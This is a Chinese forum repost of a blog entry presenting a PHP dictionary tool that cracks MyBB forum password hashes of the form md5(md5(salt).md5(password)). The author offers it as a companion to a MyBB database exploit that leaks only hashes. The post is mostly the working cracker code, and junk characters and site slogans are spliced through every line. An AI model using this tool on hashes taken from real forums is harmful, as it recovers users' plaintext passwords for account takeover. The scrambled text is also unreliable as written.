文章来源:cool_wxd的博客
6 C& l- y2 w6 x9 f7 j" [6 D前两天和消失看的那个myBB论坛的exploit之后,破解出来的密码很变态~是经过md5(md5(salt).md(pass))这种形式的~
我爱电脑技术论坛. W; e7 T N2 L1 j
一直没有进展~今天编写了一个小的利用程序~希望大家能用得上~
; B2 ^ M& Q0 X7 }4 O打造最好的电脑自学交流论坛pass.txt为密码字典~~一行一个~
我爱电脑技术论坛- c7 q3 `7 z K5 _5 g# Y. d* }$ ?
( {; j; M* q. ~www.520diannao.com另外,虽然程序中用了很垃圾的英文字符,但是程序绝对原创~
www.520diannao.com$ l: ^) @0 d: Q+ I& m
% P8 R! x; m+ b% m/ f7 i: }我爱电脑技术社区--打造最好的电脑技术自学交流平台[Copy to clipboard] [ - ]CODE:<?php
0 R1 N& H/ B2 }$ a hwww.520diannao.com/*
打造最好的电脑自学交流论坛- d1 u! O7 G: T' \' b2 f& E5 L
MyBB论坛程序密码暴力破解工具PHP版 By Cool_wXd[C.R.S.T]
打造最好的电脑自学交流论坛) _; ~1 ~6 o5 E- A6 y) Q
本程序主要是针对MyBB论坛程序密码加密形式md5(md5(salt).md5(password))
7 W( v1 O1 o8 p) u0 u* p( n由于网络上针对MyBB的exploit程序只是破解出来数据库中的密码,而没有破解出来真正的密码
! b1 T/ x; T% B% U5 `! O( r电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站也是由于最近遇到这样的问题,所以写出这么一个简单的小程序希望能够有所帮助!
+ L' i$ N; q6 H. t: Y% ~/ c/ @我爱电脑技术论坛*/
! n) B g% Y5 Y. Wif ($argc<3)
6 _+ q; T7 K% x% B% B* X{
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站8 \# E5 ~1 @: i! C' E
print "--------------------------------------------------------------\r\n";
3 P, t( T7 _' H; c) U) ^0 k5 Vprint " MyBB Password Cracker v1.0\r\n";
4 P6 z/ N' {) A2 xwww.520diannao.comprint "--------------------------------------------------------------\r\n";
+ ^/ ]1 t) W. y5 J我爱电脑技术论坛print "Usage: mybb_password_cracker.php [md5_hash] [salt]\r\n";
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站/ o# M$ v( Z5 }" h: X4 U' D5 m" D
print "--------------------------------------------------------------\r\n";
) B. k! n2 ?7 l# z/ Z+ e打造最好的电脑自学交流论坛print "http://www.wolfexp.net &
http://hi.baidu.com/cool_wxd\r\n";
我爱电脑技术论坛 b4 W y0 u! i8 s1 K$ n, ~/ u
print " By Cool_wXd[C.R.S.T]\r\n";
我爱电脑技术社区--打造最好的电脑技术自学交流平台3 [2 b( e# b) a/ K: t
print "--------------------------------------------------------------\r\n";
打造最好的电脑自学交流论坛- I8 @2 ?3 g' q* E& J
die;
/ x+ Q4 H% u/ K打造最好的电脑自学交流论坛}
` f" f* d' J5 A* s H& y$ b打造最好的电脑自学交流论坛function salt_password($password, $salt)
打造最好的电脑自学交流论坛7 N& Q" [( N1 N+ I4 U
{
% y# R( ]; k+ C$ H; L4 W打造最好的电脑自学交流论坛return md5(md5($salt).md5($password));
4 m9 Q v# p" M0 ^' b$ w. S我爱电脑技术论坛}
2 L. u: c0 z5 Z$ w7 e3 U$md5_hash = $argv[1];
我爱电脑技术社区--打造最好的电脑技术自学交流平台2 h: w; i, P- r1 k
$salt = $argv[2];
我爱电脑技术社区--打造最好的电脑技术自学交流平台/ u) }' t" U: B x* M( x: {
$dict="pass.txt";//password dictionary
9 f: g# f* d+ |' p6 h- k我爱电脑技术论坛if (strlen($md5_hash)!=32) {echo 'Error... The md5_hash must be 32 bits'; die;}
www.520diannao.com/ O5 }7 n' n2 j8 R; ~. z6 ?
if(!file_exists($dict)) {echo 'Can not find the password dictionary';die;}
- w5 s! q& ] ywww.520diannao.com$dict_pass=file($dict);
www.520diannao.com& h+ j5 M& \5 D
$num=sizeof($dict_pass);
打造最好的电脑自学交流论坛5 o+ ]$ D# f' p$ T( i
for($i=0;$i<$num;$i++)
4 v9 t7 K$ m3 C2 p打造最好的电脑自学交流论坛{
我爱电脑技术论坛9 O& R; i: Y: M& S& ?4 g& b
$now_password=chop($dict_pass[$i]);
' L5 U! {& _) i, G* x我爱电脑技术论坛if($md5_hash==salt_password($now_password,$salt)) {echo 'Success!('.$md5_hash.')is cracked and the true password is:('.$now_password.')';break;}}
打造最好的电脑自学交流论坛, i/ _$ s+ K) H" \2 ~
?>
3 E: G3 q5 {$ K/ O* {' Y' { r打造最好的电脑自学交流论坛另外,我们测试的那个论坛中我们注册账号的密码破解如图
我爱电脑技术社区--打造最好的电脑技术自学交流平台1 J. e+ b4 y; }% n. {
www.520diannao.com5 O. M0 Q# Q: Y1 c
